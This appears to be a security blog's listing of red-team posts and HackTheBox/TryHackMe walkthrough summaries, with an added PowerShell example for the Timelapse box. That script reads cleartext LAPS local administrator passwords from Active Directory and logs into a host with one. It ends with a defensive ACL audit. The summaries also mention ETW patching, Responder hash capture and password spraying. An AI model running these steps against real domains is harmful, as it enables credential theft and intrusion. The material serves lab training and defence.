Lateral Movement With Cobalt Strike
In this short blog, we revisit Cobalt Strike and explore the somewhat undocumented advantages of using HTTP(S) listeners for lateral movement instead of the traditional SMB named-pipe and reverse TCP listeners. We also cover how to use HTTP listeners in place of SMB/TCP during simulated red team operations...
Introduction to BOF, Beacon Object Files not Buffer OverFlows
Beginner-friendly blog explaining BOFs, then writing a custom process-injection BOF and a BOF that patches ETW in a remote process.
Perspective HTB Walkthrough
Perspective
Perspective is a machine on HackTheBox, submitted by w1nd3x. The machine starts from a web server running IIS. Eventually this leads to hijacking the admin panel through a misconfiguration in the forgot-password functionality. We then exploit an insecure upload feature, which gets us the web.config and an XSS. Later we get all the important fields to e...
Timelapse HTB Walkthrough
Timelapse
Timelapse is a 20-point machine on HackTheBox, submitted by d4rkpayl0ad. We get an initial foothold by cracking a certificate's password and using the certificate to get a WinRM session. For root we run BloodHound and find a group named LAPS_READERS that can read LAPS passwords; the user svc_deploy is a member of that group. We escalate...
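The LAPS_READERS step above, written out as an added PowerShell example (this is not the walkthrough's own command list). It assumes a WinRM session on the domain as svc_deploy with the RSAT ActiveDirectory module available, legacy LAPS (the cleartext password lives in the ms-Mcs-AdmPwd attribute), and that the managed local account is the built-in Administrator; the group name LAPS_READERS and the user svc_deploy come from the summary, everything else is illustrative.

```powershell
# Added example, not from the original walkthrough.
# Assumes: WinRM session as svc_deploy, RSAT ActiveDirectory module, legacy LAPS
# (ms-Mcs-AdmPwd / ms-Mcs-AdmPwdExpirationTime). Names other than LAPS_READERS and
# svc_deploy are assumptions.
Import-Module ActiveDirectory

# 1. Confirm the foothold user is actually in the group BloodHound pointed at
#    (-Recursive also catches membership through nested groups).
$members = (Get-ADGroupMember -Identity 'LAPS_READERS' -Recursive).SamAccountName
if ($members -notcontains 'svc_deploy') {
    Write-Warning 'svc_deploy is not a member of LAPS_READERS; the read below will come back empty'
}

# 2. Read every LAPS password this principal is allowed to see. AD simply omits the
#    confidential attribute for callers without rights, so filter on a non-empty value.
$lapsEntries = Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime' |
    Where-Object { $_.'ms-Mcs-AdmPwd' } |
    ForEach-Object {
        [pscustomobject]@{
            Computer = $_.Name
            Password = $_.'ms-Mcs-AdmPwd'
            # Expiration is stored as a Windows FILETIME (int64), not a readable date.
            Expires  = [DateTime]::FromFileTime([int64]$_.'ms-Mcs-AdmPwdExpirationTime')
        }
    }
$lapsEntries | Format-Table -AutoSize

# 3. Use the first recovered password as the local Administrator of that host
#    (account name is an assumption: LAPS can be configured to manage a renamed account).
if ($lapsEntries) {
    $target = $lapsEntries[0]
    $secure = ConvertTo-SecureString $target.Password -AsPlainText -Force
    $cred   = New-Object System.Management.Automation.PSCredential("$($target.Computer)\Administrator", $secure)
    Enter-PSSession -ComputerName $target.Computer -Credential $cred
}

# Defender's side of the same question: which principals hold read rights on
# ms-Mcs-AdmPwd at the Computers container? Reading the attribute needs ReadProperty
# plus the control-access (ExtendedRight) bit because LAPS marks it confidential.
$schemaNC   = (Get-ADRootDSE).schemaNamingContext
$attrGuid   = [guid](Get-ADObject -SearchBase $schemaNC -Filter "name -eq 'ms-Mcs-AdmPwd'" -Properties schemaIDGUID).schemaIDGUID
$container  = (Get-ADDomain).ComputersContainer
(Get-Acl "AD:\$container").Access |
    Where-Object { $_.ObjectType -eq $attrGuid -and
                   ($_.ActiveDirectoryRights -band [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight -or
                    $_.ActiveDirectoryRights -band [System.DirectoryServices.ActiveDirectoryRights]::ReadProperty) } |
    Select-Object IdentityReference, ActiveDirectoryRights, IsInherited
```

The ACL query at the end is what BloodHound's ReadLAPSPassword edge summarises; running it against each OU that holds workstations and servers (not only the default Computers container) shows whether a group such as LAPS_READERS is larger than it should be.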
Acute HTB Walkthrough
Acute
Acute is a 40-point machine created and submitted by dmw0ng. The creator rated the box hard, and the community rating agrees. The machine starts from an HTTPS web server and some OSINT. After the initial foothold, we find a scheduled task running, which eventually leads to new credentials and a new PowerShell session on...
Set THM Walkthrough
Set
Set is a 90-point machine on TryHackMe created by 4nqr34z and Omarbdrn. The initial foothold involves finding usernames and password spraying; later, we capture an NTLMv2 hash using Responder, crack it, and get a WinRM session. For root, we exploit the Veeam ONE Agent service by customizing Metasploit's exploit. Later in the walk...